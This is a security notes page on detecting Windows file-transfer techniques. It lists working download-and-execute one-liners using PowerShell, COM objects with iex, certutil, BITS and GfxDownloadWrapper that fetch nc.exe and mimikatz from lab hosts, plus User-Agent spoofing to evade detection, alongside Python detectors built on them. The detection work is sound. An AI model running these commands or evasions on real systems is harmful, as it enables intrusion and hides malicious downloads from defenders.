Noirchapeau's Gitbook

File Transfer Detection & Evasion Techniques

Detection Methods

1. Command Line Detection

  • Methodology: Build an allowlist (whitelist) of the command lines that are normal for the environment rather than a blocklist of known-bad strings; anything outside that baseline is reviewed

  • Key Point: Whitelisting takes more effort up front, because every legitimate use of download-capable binaries (certutil, bitsadmin, PowerShell) has to be baselined, but it also catches variants that no blocklist has seen yet

  • Best Practice: Log process creation with the full command line (Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled) and alert on unusual patterns: URLs in the arguments of signed system binaries, -OutFile pointing at a world-writable path, COM download objects created from PowerShell, and IEX/Invoke-Expression applied to fetched content

2. HTTP Protocol Analysis

  • Focus Area: User-Agent string detection. Each Windows download utility sets its own User-Agent (see the signatures below), so proxy or IDS logs can attribute a request to the tool that made it

  • Implementation Steps:

    1. Create a whitelist of the user agents legitimately seen in the environment

    2. Include common system processes that speak HTTP without a browser

    3. Document legitimate services (Windows Update, AV and software updaters) and the agents they send

    4. Configure the SIEM to alert on any user agent outside the whitelist, not only on known-bad strings

  • Caveat: the User-Agent is fully attacker-controlled and is only visible in plaintext HTTP or behind a TLS-inspecting proxy, so treat it as one signal to correlate with process command-line telemetry rather than as a standalone control

Common Transfer Methods & Detection Signatures

1. PowerShell Invoke-WebRequest

# Download Command
Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

# Detection Signature (the build number after WindowsPowerShell/ follows the host's PowerShell version, so match on the WindowsPowerShell/ token)
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

2. WinHttpRequest

# Download Command
$h=new-object -com WinHttp.WinHttpRequest.5.1
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.ResponseText   # runs the response as script; a binary such as nc.exe would instead be written to disk from $h.ResponseBody

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

3. Msxml2.XMLHTTP

# Download Command
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.responseText

# Detection Signature (Msxml2.XMLHTTP sends the host's Internet Explorer string, so it varies per machine and also appears in legitimate legacy application traffic)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

4. Certutil

# Download Commands
certutil -urlcache -split -f http://10.10.10.32/nc.exe
certutil -verifyctl -split -f http://10.10.10.32/nc.exe

# Detection Signature
User-Agent: Microsoft-CryptoAPI/10.0

5. BITS Transfer

# Download Command
Import-Module bitstransfer
Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t
$r=gc $env:temp\t
rm $env:temp\t
iex $r

# Detection Signature (the version after BITS/ follows the OS build, so match on the Microsoft BITS/ token)
User-Agent: Microsoft BITS/7.8
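The command-line side of the methodology above (allowlist first, then signatures for the five transfer methods and the LOLBAS example) as an added Python example; it is not code from the original notes. The sample command lines are constructed to look like the CommandLine field of Sysmon Event ID 1 / Security 4688 records and are not real telemetry, and the ALLOWLIST entries are assumed baseline values for a fictional environment.

```python
"""Allowlist-first command-line detection for the download methods on this page.

Added example, not code from the original notes. The sample command lines are
constructed to look like the CommandLine field of Sysmon Event ID 1 / Security
4688 records and are not real telemetry; the ALLOWLIST entries are assumed
baseline values for a fictional environment.
"""
import re
from typing import List, NamedTuple


def normalise(cmdline: str) -> str:
    """Lower-case, strip quotes and collapse whitespace so that case changes
    (CeRtUtIl) or extra quoting do not defeat either the allowlist or the patterns."""
    unquoted = cmdline.replace('"', "").replace("'", "")
    return re.sub(r"\s+", " ", unquoted).strip().lower()


# Assumed baseline: command lines known to be legitimate in this environment.
# An exact normalised match is accepted without further checks (whitelisting
# over blacklisting, as the methodology above puts it).
ALLOWLIST = {
    normalise('powershell.exe -NoProfile -Command "Invoke-RestMethod https://intranet.corp.local/api/health"'),
    normalise("certutil -store Root"),
}

# Signatures for the transfer methods listed above. Patterns are written for
# normalised (lower-case) input; switches accept '-' or '/' because certutil
# and bitsadmin take either.
PATTERNS = {
    "powershell-webrequest": re.compile(r"\b(invoke-webrequest|invoke-restmethod|iwr|irm)\b[^|;]*?https?://"),
    "winhttp-com":           re.compile(r"winhttp\.winhttprequest"),
    "msxml2-com":            re.compile(r"msxml2\.(server)?xmlhttp"),
    "certutil-download":     re.compile(r"\bcertutil(\.exe)?\b.*?[-/](urlcache|verifyctl)\b.*?https?://"),
    "bits-download":         re.compile(r"\b(start-bitstransfer|bitsadmin(\.exe)?)\b"),
    "gfxdownloadwrapper":    re.compile(r"gfxdownloadwrapper(\.exe)?\b.*?https?://"),
    # Not a download on its own, but IEX over fetched text is the in-memory
    # execution step that follows the WinHttp, Msxml2 and BITS methods above.
    "iex-execution":         re.compile(r"\b(iex|invoke-expression)\b"),
}


class Finding(NamedTuple):
    techniques: tuple
    cmdline: str


def detect(cmdline: str) -> List[str]:
    """Technique labels matched by one command line; [] if allowlisted or clean.
    The allowlist is consulted before any pattern so baselined activity never alerts."""
    norm = normalise(cmdline)
    if norm in ALLOWLIST:
        return []
    return [name for name, rx in PATTERNS.items() if rx.search(norm)]


def scan(cmdlines) -> List[Finding]:
    """Run detect() over a batch and keep only the lines that produced findings."""
    findings = []
    for cmdline in cmdlines:
        hits = detect(cmdline)
        if hits:
            findings.append(Finding(tuple(hits), cmdline))
    return findings


# Constructed sample command lines (not real telemetry): one per method above,
# plus an allowlisted line, a benign line and a case/switch-style evasion.
SAMPLE_CMDLINES = [
    r'powershell.exe -nop -w hidden Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"',
    r"certutil.exe -urlcache -split -f http://10.10.10.32/nc.exe",
    'powershell.exe -NoProfile -Command "Invoke-RestMethod https://intranet.corp.local/api/health"',
    r'''powershell -c "$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.10.32/nc.exe',$false);$h.send();iex $h.ResponseText"''',
    r'''powershell -c "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.10.32/nc.exe',$false);$h.send();iex $h.responseText"''',
    r'GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"',
    r'''powershell -c "Import-Module bitstransfer; Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t; $r=gc $env:temp\t; rm $env:temp\t; iex $r"''',
    r"CeRtUtIl /UrLcAcHe /f http://10.10.10.32/nc.exe",
    r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(", ".join(finding.techniques), "<-", finding.cmdline)
```

The allowlisted Invoke-RestMethod call to the intranet API would match the PowerShell pattern, yet produces no finding because the baseline is consulted first; the same cmdlet with an unknown URL is flagged. Normalising before matching is what makes the mixed-case certutil line with slash switches fall into the same bucket as the textbook form.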

Evasion Techniques

1. User Agent Manipulation

Listing Available User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Common User Agent Strings

  • Internet Explorer:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)
  • Firefox:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0
  • Chrome:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6
  • Opera:

Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1
  • Safari:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16

Custom User Agent Implementation

# Set Chrome User Agent (PSUserAgent template)
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

-UserAgent accepts any string, so a current browser string copied from the target environment blends in better than the templates: every PSUserAgent value reports a years-old browser version (Chrome/7, Firefox/4) and the same "Windows NT; Windows NT 10.0; en-US" platform token, both of which a defender can signature.
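The User-Agent allowlisting described under HTTP Protocol Analysis, run against the signatures above and against the PSUserAgent evasion from this section, as an added Python example; it is not code from the original notes. The proxy log lines are constructed rather than captured, and the ALLOWLIST values and MIN_CHROME_MAJOR floor are assumed baseline settings for a fictional environment.

```python
"""User-Agent allowlisting over constructed proxy log lines.

Added example serving both the 'HTTP Protocol Analysis' steps and the 'User Agent
Manipulation' section above; it is not code from the original notes. Log lines are
constructed, not captured traffic. The ALLOWLIST values and MIN_CHROME_MAJOR are
assumed baseline settings for a fictional environment.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple

# Constructed log format: <timestamp> <client> <method> <url> <status> "<user-agent>"
LINE_RX = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


class Alert(NamedTuple):
    client: str
    url: str
    reason: str
    user_agent: str


# Steps 1-3: agents observed during the baseline (assumed values). Exact strings
# for browsers pinned by software deployment, patterns for agents whose version
# part changes with every update.
ALLOWLIST = {
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
    "Microsoft-Delivery-Optimization/10.0",
}
ALLOWLIST_RX = [re.compile(r"^Windows-Update-Agent/[\d.]+")]

# Tool signatures from the detection signatures above. Matching on the tool token
# rather than the full string tolerates the version part varying per host.
TOOL_SIGNATURES = [
    ("powershell-webrequest", re.compile(r"WindowsPowerShell/")),
    ("winhttp-com", re.compile(r"WinHttp\.WinHttpRequest")),
    ("certutil-cryptoapi", re.compile(r"^Microsoft-CryptoAPI/")),
    ("bits", re.compile(r"^Microsoft BITS/")),
    # Msxml2.XMLHTTP sends the host's Internet Explorer string, which legacy
    # applications also send, so this label is lower confidence.
    ("msxml2-or-legacy-ie", re.compile(r"MSIE 7\.0;.*Trident/7\.0")),
]

# Every PSUserAgent template (and PowerShell's default agent) carries the
# duplicated platform token 'Windows NT; Windows NT 10.0; en-US', which real
# browsers never emit, so a spoofed 'Chrome' from PowerShell is still recognisable.
PSUSERAGENT_RX = re.compile(r"\(.*Windows NT; Windows NT \d+\.\d+; [a-z]{2}-[A-Z]{2}\)")

# The templates also claim ancient browser versions (Chrome/7, Firefox/4).
# Assumed floor: no managed host should present a Chrome major below this.
CHROME_RX = re.compile(r"Chrome/(\d+)\.")
MIN_CHROME_MAJOR = 100


def classify(user_agent: str) -> List[str]:
    """Reasons to alert on one User-Agent; [] when it is allowlisted.
    Step 4: alert on everything the baseline did not cover, and add a tool
    label where a signature explains what made the request."""
    if user_agent in ALLOWLIST or any(rx.search(user_agent) for rx in ALLOWLIST_RX):
        return []
    reasons = [name for name, rx in TOOL_SIGNATURES if rx.search(user_agent)]
    if PSUSERAGENT_RX.search(user_agent):
        reasons.append("psuseragent-template")
    chrome = CHROME_RX.search(user_agent)
    if chrome and int(chrome.group(1)) < MIN_CHROME_MAJOR:
        reasons.append("stale-browser-version")
    return reasons or ["not-in-allowlist"]


def scan(lines) -> List[Alert]:
    """Parse each log line and emit one Alert per reason; malformed lines are skipped."""
    alerts = []
    for line in lines:
        match = LINE_RX.match(line.strip())
        if not match:
            continue
        _ts, client, _method, url, _status, user_agent = match.groups()
        for reason in classify(user_agent):
            alerts.append(Alert(client, url, reason, user_agent))
    return alerts


def by_client(alerts: List[Alert]) -> Dict[str, List[str]]:
    """Group alert reasons per client (the 'analyze transfer patterns' step):
    one host cycling through several download agents stands out immediately."""
    grouped = defaultdict(set)
    for alert in alerts:
        grouped[alert.client].add(alert.reason)
    return {client: sorted(reasons) for client, reasons in grouped.items()}


# Constructed sample log (not real traffic): one host runs the five methods above
# and then the spoofed PSUserAgent Chrome string; another only browses, updates
# and runs a legacy application.
SAMPLE_LOG = [
    '2024-05-02T10:14:03Z 10.10.14.7 GET http://10.10.10.32/nc.exe 200 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0"',
    '2024-05-02T10:14:09Z 10.10.14.7 GET http://10.10.10.32/nc.exe 200 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"',
    '2024-05-02T10:14:15Z 10.10.14.7 GET http://10.10.10.32/nc.exe 200 "Microsoft-CryptoAPI/10.0"',
    '2024-05-02T10:14:21Z 10.10.14.7 GET http://10.10.10.32/nc.exe 200 "Microsoft BITS/7.8"',
    '2024-05-02T10:14:30Z 10.10.14.7 GET http://10.10.10.32/nc.exe 200 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6"',
    '2024-05-02T10:15:02Z 10.10.14.22 GET https://intranet.corp.local/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"',
    '2024-05-02T10:15:10Z 10.10.14.22 GET http://update.corp.local/x 200 "Microsoft-Delivery-Optimization/10.0"',
    '2024-05-02T10:15:40Z 10.10.14.22 GET http://10.10.10.32/nc.exe 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)"',
]

if __name__ == "__main__":
    for client, reasons in by_client(scan(SAMPLE_LOG)).items():
        print(client, reasons)
```

The spoofed Chrome request never trips a tool signature, which is the point of the evasion, but it is still surfaced twice: it is not on the allowlist, and the PSUserAgent platform token and the Chrome/7 version give it away. Remember that the proxy only sees these headers for plaintext HTTP or TLS-inspected traffic, so the same host's process command lines remain the stronger evidence.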

2. LOLBAS (Living Off The Land Binaries)

  • Purpose: Perform the download with a signed binary that is already on the host, so application whitelisting sees a trusted executable and no new tooling has to be dropped first

  • Example Using GfxDownloadWrapper.exe (ships with Intel graphics drivers, so it is only present on hosts that have them installed):

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Detection & Defense Methodology Checklist

Immediate Actions

Regular Monitoring

Investigation Steps

  1. Identify suspicious user agents

  2. Analyze transfer patterns

  3. Cross-reference with whitelist

  4. Document new threat patterns

Additional Resources


LOLBAS Project (Windows): https://lolbas-project.github.io/

GTFOBins (Linux): https://gtfobins.github.io/